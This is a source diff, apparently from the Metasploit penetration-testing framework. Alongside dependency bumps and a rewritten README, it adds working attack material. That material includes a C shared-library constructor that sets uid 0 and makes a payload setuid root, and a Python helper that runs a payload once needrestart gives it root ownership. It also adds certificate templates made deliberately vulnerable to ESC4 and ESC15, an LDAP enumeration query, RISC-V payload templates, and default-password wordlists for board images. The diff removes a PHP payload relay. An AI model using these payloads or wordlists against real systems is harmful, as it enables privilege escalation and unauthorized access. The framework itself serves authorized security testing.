+rexml, 3.3.9, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
-rspec-core, 3.13.0, MIT
-rspec-expectations, 3.13.2, MIT
-rspec-mocks, 3.13.1, MIT
-rspec-rails, 6.1.4, MIT
+rspec-core, 3.13.2, MIT
+rspec-expectations, 3.13.3, MIT
+rspec-mocks, 3.13.2, MIT
+rspec-rails, 7.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.13.1, MIT
-rubocop, 1.64.1, MIT
-rubocop-ast, 1.31.3, MIT
-ruby-macho, 4.0.1, MIT
+rubocop, 1.67.0, MIT
+rubocop-ast, 1.33.0, MIT
+ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.9, "New BSD"
-rubyntlm, 0.6.4, MIT
+ruby_smb, 3.3.13, "New BSD"
+rubyntlm, 0.6.5, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
-simplecov-html, 0.12.3, MIT
+simplecov-html, 0.13.1, MIT
 simpleidn, 0.2.3, MIT
 sinatra, 3.2.0, MIT
 sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
-strscan, 3.1.0, "ruby, Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.3.3, MIT
+test-prof, 1.4.2, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.1, MIT
-tilt, 2.3.0, MIT
-timecop, 0.9.9, MIT
+thor, 1.3.2, MIT
+tilt, 2.4.0, MIT
+timecop, 0.9.10, MIT
 timeout, 0.4.1, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2024.1, MIT
-unicode-display_width, 2.5.0, MIT
+tzinfo-data, 1.2024.2, MIT
+unicode-display_width, 2.6.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
-webrick, 1.8.1, "ruby, Simplified BSD"
+webrick, 1.8.2, "ruby, Simplified BSD"
 websocket-driver, 0.7.6, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
-winrm, 2.3.6, "Apache 2.0"
+winrm, 2.3.9, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
-yard, 0.9.36, MIT
-zeitwerk, 2.6.17, MIT
+yard, 0.9.37, MIT
+zeitwerk, 2.6.18, MIT
@@ -1,52 +1,45 @@
-Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
-==
-The Metasploit Framework is released under a BSD-style license. See
-[COPYING](COPYING) for more details.
+# Metasploit Framework

-The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
+The Metasploit Framework is an open-source tool released under a BSD-style license. For detailed licensing information, refer to the `COPYING` file.

-You can find documentation on Metasploit and how to use it at:
- https://docs.metasploit.com/
+## Latest Version
+Access the latest version of Metasploit from the [Nightly Installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) page.

-Information about setting up a development environment can be found at:
- https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+## Documentation
+Comprehensive documentation, including usage guides, is available at [Metasploit Docs](https://docs.metasploit.com/).

-Our bug and feature request tracker can be found at:
- https://github.com/rapid7/metasploit-framework/issues
+## Development Environment
+To set up a development environment, visit the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).

-New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+## Bug and Feature Requests
+Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) tracker. New submissions can be made through the [MSF-BUGv1 form](https://github.com/rapid7/metasploit-framework/issues/new/choose).

-API documentation for writing modules can be found at:
-  https://docs.metasploit.com/api/
+## API Documentation
+For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+## Support and Communication
+For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.

-Installing
--
+## Installing Metasploit

-Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
-which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
-you'd like to deal with dependencies on your own.
+### Recommended Installation

-Using Metasploit
--
-Metasploit can do all sorts of things. The first thing you'll want to do
-is start `msfconsole`, but after that, you'll probably be best served by
-reading the basics of [using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-or [Metasploit Unleashed][unleashed].
+We recommend installation with the [official Metasploit installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos) on Linux or macOS. Metasploit is also pre-installed with Kali.

-Contributing
--
-See the [Dev Environment Setup][devenv] guide on GitHub, which will
-walk you through the whole process from installing all the
-dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more information, see
-[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+For a manual setup, consult the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) guide.

+## Using Metasploit

-[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+To get started with Metasploit:

+1. **Start `msfconsole`:** This is the primary interface for interacting with Metasploit.
+2. **Explore Resources:** 
+   - Visit the [Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/getting-started/index.html) section of the documentation.

+## Contributing
+
+To contribute to Metasploit:
+
+1. **Setup Development Environment:** Follow the instructions in the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) on GitHub.
+2. **Clone the Repository:** Obtain the source code from the official repository.
+3. **Submit a Pull Request:** After making changes, submit a pull request for review. Additional details can be found in the [Contributing Guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
@@ -10,6 +10,8 @@ info:
  x-cortex-type: service
  x-cortex-domain-parents:
  - tag: metasploit
+  x-cortex-groups:
+  - exposure:external-ship
 openapi: 3.0.1
 servers:
 - url: "/"
@@ -0,0 +1,31 @@
+---
+# Creates a template that will be vulnerable to ESC15 (subject name supplied in
+# the request and schema version is 1). Fields are based on the SubCA template.
+# For field descriptions, see:
+# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: -1
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (alter the EKUs via ESC15)
+- 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+msPKI-Certificate-Name-Flag: 1
+msPKI-Minimal-Key-Size: 2048
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+  - 2.5.29.19
+  - 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
+  - 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -373,3 +373,17 @@ queries:
      - https://malicious.link/post/2022/ldapsearch-reference/
      - https://burmat.gitbook.io/security/hacking/domain-exploitation
      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_PRE_WINDOWS_2000_COMPUTERS
+    description: 'Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.'
+    filter: '(&(userAccountControl=4128))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - logonCount
+      - userAccountControl
+    references:
+      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
+      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
@@ -1,3 +1,4 @@
+# configuration file for the capture plugin
 spoof_regex: .*
 ntlm_challenge: "1122334455667788"
 ntlm_domain: anonymous
@@ -6,6 +7,7 @@ ssl_cert: null
 logfile: null
 hashdir: null
 services:
+  # authentication services
  - type: DRDA
    enabled: yes
  - type: FTP
@@ -46,6 +48,7 @@ services:
    enabled: yes
  - type: SMTPS
    enabled: yes
+  # spoofing / poisoning services
  - type: NBNS
    enabled: yes
  - type: LLMNR
@@ -1,25 +1,29 @@
 ## Setup

-This contains setup steps used for acceptance testing of the `cmd_exec` API. We will make use of the gcc docker image to 
-build out the C binaries to then be uploaded to the host machine, so they can be used as part of the `cmd_exec` 
+This contains setup steps used for acceptance testing of the `cmd_exec` API. We will make use of the gcc docker image to
+build out the C binaries to then be uploaded to the host machine, so they can be used as part of the `cmd_exec`
 create process API.

 This directory contains:
 - C executable `show_args.c`
-This file is used as part of the `cmd_exec` testing as it requires a file to take args, then loop over them and output 
-those args back to the user.
+  This file is used as part of the `cmd_exec` testing as it requires a file to take args, then loop over them and output
+  those args back to the user.

 - Makefile to build the binaries `makefile.mk`
-This file is used to create the binaries for both Windows and Linux that the docker command below will make use of.
+  This file is used to create the binaries for both Windows and Linux that the docker command below will make use of.
+  This will output the following binaries:

- Precompiled binaries for Windows
-  - `show_args.exe`
+  - Precompiled binary for Windows
+    - `show_args.exe`

- Precompiled binaries for Linux and Mettle
-  - `show_args`
+  - Precompiled binary for Linux and Mettle
+    - `show_args`
+
+### Note
+
+You will need to compile the OSX payload separately on an OSX machine, Docker is not supported. The test assume the file
+will be named as `show_args_macos`.

- Precompiled binaries for macOS
-  - `show_args_macos`

 ## Compile binaries locally

@@ -29,5 +33,3 @@ We make use of gcc for this: https://hub.docker.com/_/gcc
 ```shell
 docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:11.4.0 /bin/bash -c "apt update && apt install -y gcc-mingw-w64 && make all -f makefile.mk"
 ```
-
-You will need to compile the OSX payload separately on an OSX machine, Docker is not supported.
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-http://www.eicar.org/anti_virus_test_file.htm
+https://www.eicar.org/download-anti-malware-testfile/
@@ -0,0 +1,27 @@
+/*
+// system call
+#include <stdlib.h>
+// setuid, setgid
+#include <unistd.h>
+
+static void a() __attribute__((constructor));
+
+void a() {
+  setuid(0);
+  setgid(0);
+  const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
+  system(shell);
+}
+*/
+
+extern int setuid(int);
+extern int setgid(int);
+extern int system(const char *__s);
+
+void a(void) __attribute__((constructor));
+
+void __attribute__((constructor)) a() {
+  setuid(0);
+  setgid(0);
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
+}
@@ -0,0 +1,17 @@
+import os
+import time
+import pwd
+
+print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
+
+while True:
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        exit()
+    username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
+    if (username == 'root'):
+        os.system('PAYLOAD_PATH &')
+        exit()
+    time.sleep(1)
@@ -1,68 +0,0 @@
-<?php
-$magic = 'TzGq';
-$tempdir = sys_get_temp_dir() . "/hop" . $magic;
-if(!is_dir($tempdir)){
-	mkdir($tempdir); //make sure it's there
-}
-
-//get url
-$url = $_SERVER["QUERY_STRING"];
-//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
-
-//Looks for a file with a name or contents prefix, if found, send it and deletes it
-function findSendDelete($tempdir, $prefix, $one=true){
-	if($dh = opendir($tempdir)){
-		while(($file = readdir($dh)) !== false){
-			if(strpos($file, $prefix) !== 0){
-				continue;
-			}
-			readfile($tempdir."/".$file);
-			unlink($tempdir."/".$file);
-			if($one){
-				break;
-			}
-		}
-	}
-}
-
-//handle control
-if($url === "/control"){
-	if($_SERVER['REQUEST_METHOD'] === 'POST'){
-		//handle data for payload - save in a "down" file or the "init" file
-		$postdata = file_get_contents("php://input");
-		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
-			$f = fopen($tempdir."/init", "w"); //only one init file
-		}else{
-			$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);
-			$f = fopen(tempnam($tempdir,$prefix), "w");
-		}
-		fwrite($f, $postdata);
-		fclose($f);
-	}else{
-		findSendDelete($tempdir, "up_", false);
-	}
-}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
-	//get data
-	$postdata = file_get_contents("php://input");
-	//See if we should send anything down
-	if($postdata === "RECV\x00" || $postdata === "RECV"){
-		findSendDelete($tempdir, "down_" . sha1($url));
-		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
-	}else{
-		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
-	}
-	//find free and write new file
-	$f = fopen($fname, "w");
-	fwrite($f, $magic);
-	//Little-endian pack length and data
-	$urlen = strlen($url);
-	fwrite($f, pack('V', $urlen));
-	fwrite($f, $url);
-	$postdatalen = strlen($postdata);
-	fwrite($f, pack('V', $postdatalen));
-	fwrite($f, $postdata);
-	fclose($f);
-//Initial query will be a GET and have a 12345 in it
-}else if(strpos($url, "12345") !== FALSE){
-	readfile($tempdir."/init");
-}
@@ -0,0 +1,98 @@
+; build with:
+;   nasm elf_dll_riscv32le_template.s -f bin -o template_riscv32le_linux_dll.bin
+
+BITS 32
+
+org     0
+
+ehdr:
+  db    0x7f, "ELF", 1, 1, 1, 0    ; e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0
+  dw    3                          ; e_type    = ET_DYN
+  dw    0xF3                       ; e_machine = EM_RISCV
+  dd    1                          ; e_version = EV_CURRENT
+  dd    _start                     ; e_entry   = _start
+  dd    phdr - $$                  ; e_phoff
+  dd    shdr - $$                  ; e_shoff
+  dd    0                          ; e_flags
+  dw    ehdrsize                   ; e_ehsize
+  dw    phdrsize                   ; e_phentsize
+  dw    2                          ; e_phnum
+  dw    shentsize                  ; e_shentsize
+  dw    2                          ; e_shnum
+  dw    1                          ; e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:
+  dd    1                          ; p_type       = PT_LOAD
+  dd    0                          ; p_offset
+  dd    $$                         ; p_vaddr
+  dd    $$                         ; p_paddr
+  dd    0xDEADBEEF                 ; p_filesz
+  dd    0xDEADBEEF                 ; p_memsz
+  dd    7                          ; p_flags      = rwx
+  dd    0x1000                     ; p_align
+
+phdrsize equ  $ - phdr
+
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dd    dynsection                 ; p_offset
+  dd    dynsection                 ; p_vaddr
+  dd    dynsection                 ; p_vaddr
+  dd    dynsz                      ; p_filesz
+  dd    dynsz                      ; p_memsz
+  dd    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dd    0                          ; sh_flags
+  dd    dynsection                 ; sh_addr
+  dd    dynsection                 ; sh_offset
+  dd    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    8                          ; sh_addralign
+  dd    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dd    0                          ; sh_flags
+  dd    strtab                     ; sh_addr
+  dd    strtab                     ; sh_offset
+  dd    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    0                          ; sh_addralign
+  dd    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dd    0x0c
+  dd    _start
+; DT_STRTAB
+  dd    0x05
+  dd    strtab
+; DT_SYMTAB
+  dd    0x06
+  dd    strtab
+; DT_STRSZ
+  dd    0x0a
+  dd    0
+; DT_SYMENT
+  dd    0x0b
+  dd    0
+; DT_NULL
+  dd    0x00
+  dd    0
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+global _start
+_start:
@@ -0,0 +1,99 @@
+; build with:
+;   nasm elf_dll_riscv64le_template.s -f bin -o template_riscv64le_linux_dll.bin
+
+BITS 64
+
+org     0
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    3                        ;   e_type       = ET_DYN
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    shdr - $$                ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    2                        ;   e_phnum
+  dw    shentsize                ;   e_shentsize
+  dw    2                        ;   e_shnum
+  dw    1                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dq    dynsection                 ; p_offset
+  dq    dynsection                 ; p_vaddr
+  dq    dynsection                 ; p_vaddr
+  dq    dynsz                      ; p_filesz
+  dq    dynsz                      ; p_memsz
+  dq    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dq    0                          ; sh_flags
+  dq    dynsection                 ; sh_addr
+  dq    dynsection                 ; sh_offset
+  dq    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    8                          ; sh_addralign
+  dq    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dq    0                          ; sh_flags
+  dq    strtab                     ; sh_addr
+  dq    strtab                     ; sh_offset
+  dq    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    0                          ; sh_addralign
+  dq    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dq    0x0c
+  dq    _start
+; DT_STRTAB
+  dq    0x05
+  dq    strtab
+; DT_SYMTAB
+  dq    0x06
+  dq    strtab
+; DT_STRSZ
+  dq    0x0a
+  dq    0
+; DT_SYMENT
+  dq    0x0b
+  dq    0
+; DT_NULL
+  dq    0x00
+  dq    0
+
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+align 16
+global _start
+_start:
@@ -9,7 +9,7 @@ ehdr:                            ; Elf32_Ehdr
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
-  dd    0                        ;   e_version
+  dd    1                        ;   e_version
  dq    _start                   ;   e_entry
  dq    phdr - $$                ;   e_phoff
  dq    0                        ;   e_shoff
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv32le_template.s -f bin -o template_riscv32le_linux.bin
+
+BITS 32
+
+org     0x00010000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dd    _start                   ;   e_entry
+  dd    phdr - $$                ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    0                        ;   p_offset
+  dd    $$                       ;   p_vaddr
+  dd    $$                       ;   p_paddr
+  dd    0xDEADBEEF               ;   p_filesz
+  dd    0xDEADBEEF               ;   p_memsz
+  dd    7                        ;   p_flags      = rwx
+  dd    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv64le_template.s -f bin -o template_riscv64le_linux.bin
+
+BITS 64
+
+org     0x00400000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -1454,6 +1454,7 @@ bewan
 beyonce
 bhaby
 bhebhe
+bianbu
 bianca
 bier
 bigboy
@@ -3061,6 +3062,7 @@ lucas
 lucenttech1
 lucenttech2
 lucero
+luckfox
 lucky
 lucky1
 lucky7
@@ -3248,6 +3250,7 @@ mikel
 mikey
 milagros
 milkshake
+milkv
 miller
 millie
 mine
@@ -3477,6 +3480,7 @@ operator
 oqksad
 oracle
 orange
+orangepi
 orlando
 orpheus
 oscar
@@ -4192,6 +4196,7 @@ stacey
 stanley
 star
 starfish
+starfive
 stargate
 stark123
 starl
@@ -7290,6 +7290,7 @@ bi
 bi-level
 bia
 bialystok
+bianbu
 bianca
 bianco
 bianka
@@ -44356,6 +44357,7 @@ limy
 lin
 lina
 linage
+linaro
 linc
 linchpin
 lincoln
@@ -45397,6 +45399,7 @@ lucita
 lucite
 lucius
 luck
+luckfox
 luckhoff
 luckier
 luckily
@@ -49040,6 +49043,7 @@ milkshark
 milksop
 milkweed
 milkwoodpark
+milkv
 milky
 mill
 millaa
@@ -55429,6 +55433,7 @@ orang-utan
 orang-utans
 orange
 orangeade
+orangepi
 orangery
 oranges
 orangey
@@ -63171,6 +63176,7 @@ radium
 radius
 radix
 radon
+radxa
 rae
 raeann
 raedene
@@ -74326,6 +74332,7 @@ stardust
 stare
 starer
 starfish
+starfive
 starfruit
 stargate
 stargaze
@@ -77837,6 +77844,7 @@ temporizer
 temporizing
 temporizingly
 temporizings
+temppwd
 tempt
 temptation
 tempted
@@ -1007,3 +1007,15 @@ arcsight
 MargaretThatcheris110%SEXY
 karaf
 vagrant
+1234
+milkv
+luckfox
+orangepi
+temppwd
+bianbu
+debian
+starfive
+linaro
+rock
+radxa
+ubuntu
@@ -28,6 +28,7 @@ cups-pk-helper
 daemon
 dbadmin
 dbus
+debian
 Debian-exim
 Debian-snmp
 demo
@@ -65,6 +66,7 @@ landscape
 libstoragemgmt
 libuuid
 lightdm
+linaro
 list
 listen
 lp
@@ -95,6 +97,7 @@ operator
 oracle
 OutOfBox
 pi
+pico
 polkitd
 pollinate
 popr
@@ -104,9 +107,12 @@ postmaster
 printer
 proxy
 pulse
+radxa
 redsocks
 rfindd
+riscv
 rje
+rock
 root
 ROOT
 rooty
@@ -143,6 +149,7 @@ systemd-timesync
 tcpdump
 trouble
 tss
+ubuntu
 udadmin
 ultra
 umountfs
@@ -1,65 +1,70 @@
-wordpress-popular-posts
-backup
-catch-themes-demo-import
-modern-events-calendar-lite
-ninja-forms
-simple-file-list
-sp-client-document-manager
-drag-and-drop-multiple-file-upload-contact-form-7
-wp-file-manager
-duplicator
-work-the-flow-file-upload
 ajax-load-more
-wpdiscuz
-wptouch
-front-end-editor
-wpshop
-plainview-activity-monitor
-sexy-contact-form
+all-in-one-wp-migration
+backup
+backup-backup
+boldgrid-backup
+bookingpress
+bulletproof-security
+catch-themes-demo-import
+chopslider
+custom-registration-form-builder-with-submission-manager
 download-manager
+drag-and-drop-multiple-file-upload-contact-form-7
+dukapress
+duplicator
+duplicator_download
+easy-wp-smtp
+elementor
+email-subscribers
+file-manager-advanced-shortcode
+front-end-editor
+gi-media-library
+give
+hash-form
 inboundio-marketing
-wp-mobile-detector
-website-contact-form-with-file-upload
-slideshow-gallery
-reflex-gallery
-wp-symposium
+learnpress
+loginizer
+masterstudy-lms-learning-management-system
+modern-events-calendar-lite
+modern-events-calendar-lite
+nextgen-gallery
+ninja-forms
+paid-memberships-pro
+perfect-survey
 photo-gallery
 pie-register
-wysija-newsletters
-dzs-zoomsounds
-all-in-one-wp-migration
-wp-ultimate-csv-importer
-wp-symposium
-masterstudy-lms-learning-management-system
-wp-gdpr-compliance
+plainview-activity-monitor
+post-smtp
+really-simple-ssl
+reflex-gallery
+royal-elementor-addons
+secure-copy-content-protection
+sexy-contact-form
+simple-backup
+simple-file-list
+slideshow-gallery
+sp-client-document-manager
+subscribe-to-comments
+ultimate-member
+website-contact-form-with-file-upload
+woocommerce-abandoned-cart
+woocommerce-payments
+wordpress-mobile-pack
+wordpress-popular-posts
+work-the-flow-file-upload
 wp-automatic
 wp-easycart
-dukapress
-loginizer
-email-subscribers
-wps-hide-login
-secure-copy-content-protection
-wordpress-mobile-pack
-learnpress
+wp-fastest-cache
+wp-file-manager
+wp-gdpr-compliance
+wp-mobile-detector
 wp-mobile-edition
-boldgrid-backup
-modern-events-calendar-lite
-gi-media-library
-chopslider
-bulletproof-security
-nextgen-gallery
-simple-backup
-subscribe-to-comments
-easy-wp-smtp
-duplicator_download
-custom-registration-form-builder-with-submission-manager
-woocommerce-abandoned-cart
-elementor
-bookingpress
-paid-memberships-pro
-woocommerce-payments
-file-manager-advanced-shortcode
-royal-elementor-addons
-backup-backup
-hash-form
-give
+wp-symposium
+wp-symposium
+wp-time-capsule
+wp-ultimate-csv-importer
+wpdiscuz
